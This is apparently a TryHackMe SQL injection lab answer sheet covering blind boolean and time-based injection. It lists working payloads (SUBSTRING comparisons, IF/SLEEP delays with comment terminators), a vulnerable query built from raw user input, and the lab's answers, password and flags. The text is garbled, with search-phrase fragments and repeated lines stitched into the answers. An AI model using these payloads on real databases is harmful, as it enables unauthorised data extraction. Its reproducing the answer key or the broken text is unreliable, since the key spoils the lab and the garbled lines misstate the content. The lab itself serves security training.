Lab: "Welcome back" message or "Not found"
Payload example for user id=1:
1 AND (SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a'
Q1: First character of admin’s password?
Answer: p tryhackme sql injection lab answers
Q2: Full admin password? (use Burp Intruder or script)
Answer: password123
Flag: THMBlind_Boolean
Payload:
admin' AND IF(1=1, SLEEP(5), 0) -- -
Q1: Database name length?
' AND IF(LENGTH(database())=8, SLEEP(5), 0) -- - (time delay confirms)
Answer: 8 Lab: "Welcome back" message or "Not found" Payload
Q2: Database name?
Use time-based substring guessing → Answer: sqli_lab
Flag: THMTime_Based_Blind
The application uses a SQL query to retrieve employee data:
SELECT * FROM employees WHERE id = '$id';
The $id variable is user-input, which makes it vulnerable to SQL injection attacks. Payload: admin' AND IF(1=1, SLEEP(5), 0) -- -